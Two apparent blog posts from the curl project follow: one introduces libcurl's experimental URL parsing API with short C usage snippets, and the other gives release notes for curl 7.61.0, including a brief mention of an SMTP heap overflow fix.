libcurl has done internet transfers specified as URLs for a long time, but the URLs you’d tell libcurl to use would always just get parsed and used internally.

Applications that pass in URLs to libcurl would of course still very often need to parse URLs, create URLs or otherwise handle them, but libcurl has not been helping with that.

At the same time, the under-specification of URLs has led to a situation where there’s really no stable document anywhere describing how URLs are supposed to work and basically every implementer is left to handle the WHATWG URL spec, RFC 3986 and the world in between all by themselves. Understanding how their URL parsing libraries, libcurl, other tools and their favorite browsers differ is complicated.

By offering applications access to libcurl’s own URL parser, we hope to tighten a problematic vulnerable area for applications where the URL parser library would believe one thing and libcurl another. This could and has sometimes lead to security problems. (See for example Exploiting URL Parser in Trending Programming Languages! by Orange Tsai)

Additionally, since libcurl deals with URLs and virtually every application using libcurl already does some amount of URL fiddling, it makes sense to offer it in the “same package”. In the curl user survey 2018, more than 40% of the users said they’d use an URL API in libcurl if it had one.

Handle based

Create a handle, operate on the handle and then cleanup the handle when you’re done with it. A pattern that is familiar to existing users of libcurl.

So first you just make the handle.

/* create a handle */
CURLU *h = curl_url();

Parse a URL

Give the handle a full URL.

/* "set" a URL in the handle */
curl_url_set(h, CURLUPART_URL,
"https://example.com/path?q=name", 0);

If the parser finds a problem with the given URL it returns an error code detailing the error.  The flags argument (the zero in the function call above) allows the user to tweak some parsing behaviors. It is a bitmask and all the bits are explained in the curl_url_set() man page.

A parsed URL gets split into its components, parts, and each such part can be individually retrieved or updated.

Get a URL part

Get a separate part from the URL by asking for it. This example gets the host name:

/* extract host from the URL */
char *host;
curl_url_get(h, CURLUPART_HOST, &host, 0);

/* use it, then free it */
curl_free(host);

As the example here shows, extracted parts must be specifically freed with curl_free() once the application is done with them.

The curl_url_get() can extract all the parts from the handle, by specifying the correct id in the second argument. scheme, user, password, port number and more. One of the “parts” it can extract is a bit special: CURLUPART_URL. It returns the full URL back (normalized and using proper syntax).

curl_url_get() also has a flags option to allow the application to specify certain behavior.

Set a URL part

/* set a URL part */
curl_url_set(h, CURLUPART_PATH, "/index.html", 0);

curl_url_set() lets the user set or update all and any of the individual parts of the URL.

curl_url_set() can also update the full URL, which also accepts a relative URL in case an existing one was already set. It will then apply the relative URL onto the former one and “transition” to the new absolute URL. Like this;

/* first an absolute URL */
curl_url_set(h, CURLUPART_URL,
     "https://example.org:88/path/html", 0);

/* .. then we set a relative URL "on top" */
curl_url_set(h, CURLUPART_URL,
     "../new/place", 0);

Duplicate a handle

It might be convenient to setup a handle once and then make copies of that…

CURLU *n = curl_url_dup(h);

Cleanup the handle

When you’re done working with this URL handle, free it and all its related resources.

curl_url_cleanup(h);

Ship?

This API is marked as experimental for now and ships for the first time in libcurl 7.62.0 (October 31, 2018). I will happily read your feedback and comments on how it works for you, what’s missing and what we should fix to make it even more usable for you and your applications!

We call it experimental to reserve the right to modify it slightly  going forward if necessary, and as soon as we remove that label the API will then be fixed and stay like that for the foreseeable future.

See also

The URL API section in Everything curl.

curl 7.61.0

Yet again we say hello to a new curl release that has been uploaded to the servers and sent off into the world. Version 7.61.0 (full changelog). It has been exactly eight weeks since 7.60.0 shipped.

Numbers

the 175th release
7 changes
56 days (total: 7,419)

88 bug fixes (total: 4,538)
158 commits (total: 23,288)
3 new curl_easy_setopt() options (total: 258)

4 new curl command line option (total: 218)
55 contributors, 25 new (total: 1,766)
42 authors, 18 new (total: 596)
  1 security fix (total: 81)

Security fixes

SMTP send heap buffer overflow (CVE-2018-0500)

A stupid heap buffer overflow that can be triggered when the application asks curl to use a smaller download buffer than default and then sends a larger file – over SMTP. Details.

New features

The trailing dot zero in the version number reveals that we added some news this time around – again.

More microsecond timers

Over several recent releases we’ve introduced ways to extract timer information from libcurl that uses integers to return time information with microsecond resolution, as a complement to the ones we already offer using doubles. This gives a better precision and avoids forcing applications to use floating point math.

Bold headers

The curl tool now outputs header names using a bold typeface!

Bearer tokens

The auth support now allows applications to set the specific bearer tokens to pass on.

TLS 1.3 cipher suites

As TLS 1.3 has a different set of suites, using different names, than previous TLS versions, an application that doesn’t know if the server supports TLS 1.2 or TLS 1.3 can’t set the ciphers in the single existing option since that would use names for 1.2 and not work for 1.3 . The new option for libcurl is called CURLOPT_TLS13_CIPHERS.

Disallow user name in URL

There’s now a new option that can tell curl to not acknowledge and support user names in the URL. User names in URLs can brings some security issues since they’re often sent or stored in plain text, plus if .netrc support is enabled a script accepting externally set URLs could risk getting exposing the privately set password.

Awesome bug-fixes this time

Some of my favorites include…

Resolver local host names faster

When curl is built to use the threaded resolver, which is the default choice, it will now resolve locally available host names faster. Locally as present in /etc/hosts or in the OS cache etc.

Use latest PSL and refresh it periodically

curl can now be built to use an external PSL (Public Suffix List) file so that it can get updated independently of the curl executable and thus better keep in sync with the list and the reality of the Internet.

Rumors say there are Linux distros that might start providing and updating the PSL file in separate package, much like they provide CA certificates already.

fnmatch: use the system one if available

The somewhat rare FTP wildcard matching feature always had its own internal fnmatch implementation, but now we’ve finally ditched that in favour of the system fnmatch() function for platforms that have such a one. It shrinks footprint and removes an attack surface – we’ve had a fair share of tiresome fuzzing issues in the custom fnmatch code.

axTLS: not considered fit for use

In an effort to slowly increase our requirement on third party code that we might tell users to build curl to use, we’ve made curl fail to build if asked to use the axTLS backend. This since we have serious doubts about the quality and commitment of the code and that project. This is just step one. If no one yells and fights for axTLS’ future in curl going forward, we will remove all traces of axTLS support from curl exactly six months after step one was merged. There are plenty of other and better TLS backends to use!

Detailed in our new DEPRECATE document.

TLS 1.3 used by default

When negotiating TLS version in the TLS handshake, curl will now allow TLS 1.3 by default. Previously you needed to explicitly allow that. TLS 1.3 support is not yet present everywhere so it will depend on the TLS library and its version that your curl is using.

Coming up?

We have several changes and new features lined up for next release. Stay tuned!

First, we will however most probably schedule a patch release, as we have two rather nasty HTTP/2 bugs filed that we want fixed. Once we have them fixed in a way we like, I think we’d like to see those go out in a patch release before the next pending feature release.